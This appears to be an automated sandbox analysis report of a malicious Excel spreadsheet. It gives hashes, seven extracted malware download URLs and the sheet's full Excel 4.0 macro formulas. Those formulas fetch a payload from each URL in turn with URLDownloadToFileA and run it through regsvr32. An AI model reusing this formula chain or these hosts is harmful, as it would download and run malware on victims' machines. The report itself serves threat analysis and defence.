Static task
static1
Behavioral task
behavioral1
Sample
85b669e2d8441495f880cbf39f837da3fc1efacac24957efa544c230e94c3dbe.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
85b669e2d8441495f880cbf39f837da3fc1efacac24957efa544c230e94c3dbe.xlsx
Resource
win10v2004-20240802-en
General
-
Target
85b669e2d8441495f880cbf39f837da3fc1efacac24957efa544c230e94c3dbe
-
Size
46KB
-
MD5
8eccf36e3354f9ddc47dbf2bf7d883d1
-
SHA1
835f2610872b8f592f2f7bad0230bae183c9f6be
-
SHA256
85b669e2d8441495f880cbf39f837da3fc1efacac24957efa544c230e94c3dbe
-
SHA512
06cf196819d5263587c27c9f9b94017eefc9af0adc2b8fd6ad32de2cab6cae5708cb26f53a68a77df53beb1083073521628173c8d0335517496dc972451bfa93
-
SSDEEP
768:SCjaoaNkoeFvy1qjVEPxngl76WJAnJwqWijuTop2j2kBM9ahSBO4Vx4SVd:fjaLiZ/hEZg43n9hx2SkBaaQ1x4Sj
Malware Config
Extracted
http://www.ajaxmatters.com/c7g8t/kYHGlphIEPNOImddm1/
http://henrysfreshroast.com/0Rq5zobAZB/
http://185.210.144.149/app/1BKfC3id6jsiH0MC/
http://13cuero.com/wp-admin/ff5srrfTNsCju6sD3/
http://45.76.178.115/sample_sticker/tihOPhaF1l0V/
http://abinsk.com/cgi-bin/fm63rXkG5Y/
http://academicinst.com/wp-includes/44ZVeVQBkeOG/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/kYHGlphIEPNOImddm1/","..\wn.ocx",0,0) =IF('KEFGK'!E7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://henrysfreshroast.com/0Rq5zobAZB/","..\wn.ocx",0,0)) =IF('KEFGK'!E9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://185.210.144.149/app/1BKfC3id6jsiH0MC/","..\wn.ocx",0,0)) =IF('KEFGK'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://13cuero.com/wp-admin/ff5srrfTNsCju6sD3/","..\wn.ocx",0,0)) =IF('KEFGK'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://45.76.178.115/sample_sticker/tihOPhaF1l0V/","..\wn.ocx",0,0)) =IF('KEFGK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://45.76.178.115/sample_sticker/tihOPhaF1l0V/","..\wn.ocx",0,0)) =IF('KEFGK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://abinsk.com/cgi-bin/fm63rXkG5Y/","..\wn.ocx",0,0)) =IF('KEFGK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://academicinst.com/wp-includes/44ZVeVQBkeOG/","..\wn.ocx",0,0)) =IF('KEFGK'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wn.ocx") =RETURN()
Signatures
Files
-
85b669e2d8441495f880cbf39f837da3fc1efacac24957efa544c230e94c3dbe.xlsx office2007